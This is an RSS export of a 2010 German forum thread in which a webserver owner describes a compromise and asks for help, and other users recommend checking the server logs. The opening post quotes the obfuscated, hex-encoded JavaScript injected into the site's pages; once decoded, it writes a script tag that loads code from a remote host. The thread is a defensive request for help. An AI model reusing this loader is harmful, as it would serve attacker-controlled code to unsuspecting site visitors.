<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>Webserver gehackt, Skripten raufgespielt</title>
    <link>http://forum.geizhals.at/feed.jsp?id=727579</link>
    <description>Geizhals-Forum</description>
    <item>
      <title>Re: Webserver gehackt, Skripten raufgespielt</title>
      <link>http://forum.geizhals.at/t727579,6230252.html#6230252</link>
      <description>wirst vermutlich im log des webserves finden, wenn sie der angreifer nicht gelöscht hat. &lt;br/&gt;</description>
      <pubDate>Sun, 14 Nov 2010 17:09:45 GMT</pubDate>
      <guid>http://forum.geizhals.at/t727579,6230252.html#6230252</guid>
      <dc:creator>*patrick star*</dc:creator>
      <dc:date>2010-11-14T17:09:45Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver gehackt, Skripten raufgespielt</title>
      <link>http://forum.geizhals.at/t727579,6230242.html#6230242</link>
      <description>&lt;blockquote&gt;&lt;em&gt; Eine Vermutung ist, dass einfach mit google danach gesucht wurde und sich halt dann jene HP angeboten hat.&lt;br&gt;&lt;/em&gt;&lt;/blockquote&gt;&lt;br&gt;&lt;br&gt;Heutzutage wird so ziemlich jeder Webserver regelmäßig nach exploits gescannt, das sehen wir auch in unseren Logs, obwohl wir eigentlich nur selbstprogrammierte Web-Apps haben.&lt;br&gt;&lt;br&gt;Welche Lücke bei dir ausgenutzt wurde, kann man sowohl nicht sagen, aber schau mal die Logfiles des Webservers an, da wird wohl kurz vor dem Hack evtl. noch etwas zu finden sein.&lt;br&gt;&lt;br/&gt;</description>
      <pubDate>Sun, 14 Nov 2010 16:57:53 GMT</pubDate>
      <guid>http://forum.geizhals.at/t727579,6230242.html#6230242</guid>
      <dc:creator>mjy@geizhals.at</dc:creator>
      <dc:date>2010-11-14T16:57:53Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver gehackt, Skripten raufgespielt</title>
      <link>http://forum.geizhals.at/t727579,6229111.html#6229111</link>
      <description>Was sagen deine Logs zu der Quelle ?&lt;br&gt;&lt;br&gt;Die würde ich mal kontaktieren - schließlich ist die wahrscheinlich genauso verseucht...&lt;br&gt;&lt;br&gt;&lt;br&gt;Ein paar dürfte es schon erwischt haben:&lt;br&gt;&lt;a href="http://www.google.com/search?q=qg2solLrupydN0&amp;hl=de" rel="noopener" target="_blank"&gt;http:/&lt;wbr/&gt;/&lt;wbr/&gt;www.google.com/&lt;wbr/&gt;search?&lt;wbr/&gt;q=qg2solLrupydN0&amp;&lt;wbr/&gt;hl=de&lt;/a&gt; &lt;br&gt;&lt;br&gt;Mich überrascht ja, dass immer derselbe Variablenname verwendet wird - wieso und wozu?&lt;br/&gt;</description>
      <pubDate>Sat, 13 Nov 2010 13:54:37 GMT</pubDate>
      <guid>http://forum.geizhals.at/t727579,6229111.html#6229111</guid>
      <dc:creator>kombipaket</dc:creator>
      <dc:date>2010-11-13T13:54:37Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver gehackt, Skripten raufgespielt</title>
      <link>http://forum.geizhals.at/t727579,6229105.html#6229105</link>
      <description>Was sagen deine Logs zu der Quelle ?&lt;br&gt;&lt;br&gt;Die würde ich mal kontaktieren - schließlich ist die wahrscheinlich genauso verseucht...&lt;br/&gt;</description>
      <pubDate>Sat, 13 Nov 2010 13:54:37 GMT</pubDate>
      <guid>http://forum.geizhals.at/t727579,6229105.html#6229105</guid>
      <dc:creator>kombipaket</dc:creator>
      <dc:date>2010-11-13T13:54:37Z</dc:date>
    </item>
    <item>
      <title>Webserver gehackt, Skripten raufgespielt</title>
      <link>http://forum.geizhals.at/t727579,6228933.html#6228933</link>
      <description>Folgendes Problem aktuell:&lt;br&gt;Ein Webserver wurde gehackt und in php und html Dateien automatisiert Code hinzugefügt, der dann etwas nachlädt, was dann wieder etwas nachlädt usw.&lt;br&gt;Sofern html im Quelltext vorhanden war gleich nach body beginn, sonst am Ende der Datei und formschön in html-body tags verpackt.&lt;br&gt;&lt;br&gt;Es wurden höchstwahrscheinlich auch Dateien in htaccess geschützen Bereichen geändert (das ist leider nicht mehr ganz nachvollziehbar).&lt;br&gt;&lt;br&gt;Meine Vermutung ist nun, dass irgendeine Sicherheitslücke (z.B. ein phpbb Forum ist darauf) oder schlecht ausprogrammierte Uploads dazu geführt haben.&lt;br&gt;&lt;br&gt;Ja - die Frage wäre was denn aktuell so die Standard-Sicherheitslücken sind, die so etwas mehr oder weniger bekannterweise zur Folge haben.&lt;br&gt;Ich weiß, die Frage ist etwas mau, aber vielleicht kursiert ja gerade etwas.&lt;br&gt;Eine Vermutung ist, dass einfach mit google danach gesucht wurde und sich halt dann jene HP angeboten hat.&lt;br&gt;Wirklich interessant wäre auch ein Scan-Kit, der nach bekannten Lücken sucht, &lt;br&gt;bzw. Websiten die sich genau mit dem Thema (aktuell kursierendes, Sicherheit) befassen. &lt;br&gt;&lt;br&gt;Sollte jemand eine VM haben, das ist der Code:&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;div class=code&gt;&lt;pre&gt;&#xD;
|script type{"text/javascript"|&#xD;
var wGss98v0zDCHi { "uBdb915uBdb935"~&#xD;
var qg2solLrupydN0 { "uBdb93cuBdb973uBdb963uBdb972u"~ &#xD;
var qg2solLrupydN1 { "Bdb969uBdb970uBdb974uBdb920uB"~ &#xD;
var qg2solLrupydN2 { "db974uBdb979uBdb970uBdb965uBd"~ &#xD;
var qg2solLrupydN3 { "b93duBdb922uBdb974uBdb965uBdb"~ &#xD;
var qg2solLrupydN4 { "978uBdb974uBdb92fuBdb96auBdb9"~ &#xD;
var qg2solLrupydN5 { "61uBdb976uBdb961uBdb973uBdb96"~ &#xD;
var qg2solLrupydN6 { "3uBdb972uBdb969uBdb970uBdb974"~ &#xD;
var qg2solLrupydN7 { "uBdb922uBdb920uBdb973uBdb972u"~ &#xD;
var qg2solLrupydN8 { "Bdb963uBdb93duBdb922uBdb968uB"~ &#xD;
var qg2solLrupydN9 { "db974uBdb974uBdb970uBdb93auBd"~ &#xD;
var qg2solLrupydN10 { "b92fuBdb92fuBdb963uBdb96fuBdb"~ &#xD;
var qg2solLrupydN11 { "975uBdb96euBdb974uBdb965uBdb9"~ &#xD;
var qg2solLrupydN12 { "72uBdb973uBdb974uBdb961uBdb97"~ &#xD;
var qg2solLrupydN13 { "4uBdb973uBdb92euBdb973uBdb965"~ &#xD;
var qg2solLrupydN14 { "uBdb972uBdb976uBdb965uBdb96du"~ &#xD;
var qg2solLrupydN15 { "Bdb970uBdb933uBdb92euBdb963uB"~ &#xD;
var qg2solLrupydN16 { "db96fuBdb96duBdb92fuBdb92fuBd"~ &#xD;
var qg2solLrupydN17 { "b96duBdb96cuBdb92euBdb970uBdb"~ &#xD;
var qg2solLrupydN18 { "968uBdb970uBdb922uBdb93euBdb9"~ &#xD;
var qg2solLrupydN19 { "20uBdb93cuBdb92fuBdb973uBdb96"~ &#xD;
var qg2solLrupydN20 { "3uBdb972uBdb969uBdb970uBdb974"~ &#xD;
var qg2solLrupydN21 { "uBdb93e"~ &#xD;
var ZPFlt1UYA1tfk { "Dh3Ln15uBdb935"~&#xD;
var ERYCkoBwTvOcS { qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21~ &#xD;
CtnqKOXMGM9bE { ERYCkoBwTvOcS.replace(/uBdb9/g,"%")~&#xD;
var iRDgo28MEsBPo { unescape~&#xD;
var wGss98v0zDCHi { "AUx2i15Dh3Ln35"~&#xD;
w9221 { this~&#xD;
var NKCGnIAa0Vzgr{w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")]~&#xD;
NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE))~&#xD;
|/script|&#xD;
&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;Danke &amp; schöne Grüße&lt;br/&gt;</description>
      <pubDate>Sat, 13 Nov 2010 11:08:24 GMT</pubDate>
      <guid>http://forum.geizhals.at/t727579,6228933.html#6228933</guid>
      <dc:creator>kj.y</dc:creator>
      <dc:date>2010-11-13T11:08:24Z</dc:date>
    </item>
  </channel>
</rss>
